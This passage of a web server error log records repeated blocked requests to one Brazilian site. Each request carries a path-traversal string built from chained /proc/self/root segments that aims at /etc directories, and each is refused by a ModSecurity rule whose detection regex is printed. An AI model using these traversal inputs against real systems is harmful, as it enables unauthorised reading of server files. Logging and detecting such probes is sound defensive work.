"ab0rbta6ubjKNq_cu4bXQgAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:11:46.651577 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.241.31:45510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rcvHIg5MgXLBnicP5vAAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:11:48.059017 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.241.31:57064] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rdAF0L0L-SsrnPo5rcgAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:11:48.270888 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.243.128:39136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rdLninkcc-iUj5Apg0QAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:11:49.386924 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.241.31:57068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rdRCii7xarUs8iHZp7gAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:11:50.761972 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:57072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rdta6ubjKNq_cu4bXRAAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:11:53.123136 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:57074] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0reNa6ubjKNq_cu4bXRgAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:11:56.513707 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.241.31:57088] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rfDJ3M9BSuKP7CAYeAwAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:11:59.086182 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.241.31:42864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rfzJ3M9BSuKP7CAYeBQAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:00.403766 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:42880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rgAF0L0L-SsrnPo5reQAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:01.708169 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.241.31:42896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rgQF0L0L-SsrnPo5regAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:04.258877 2026] [:error] [pid 31215:tid 140411699963648] [client 74.7.241.31:42902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rhAF0L0L-SsrnPo5rfQAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:07.536572 2026] [:error] [pid 11167:tid 140411741927168] [client 74.7.243.128:53662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rh_HIg5MgXLBnicP5zgAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:07.733855 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.241.31:42906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rhwF0L0L-SsrnPo5rgAAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:09.450631 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.243.128:35668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0riDJ3M9BSuKP7CAYeEgAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:12:11.607413 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.241.31:58056] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rizJ3M9BSuKP7CAYeGQAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:13.439198 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:58064] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rjOoXxyEfFpUF8f-DowAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:14.757677 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:58078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rjuoXxyEfFpUF8f-DpwAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:15.624867 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.243.128:46840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rjxCii7xarUs8iHZqBwAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:12:17.196667 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:58090] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rkNa6ubjKNq_cu4bXUQAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:18.786134 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.241.31:45102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rkvXLqtnMIWvjpaKc7gAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:21.200277 2026] [:error] [pid 11642:tid 140411599251200] [client 74.7.241.31:45116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rlbninkcc-iUj5Apg2gAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
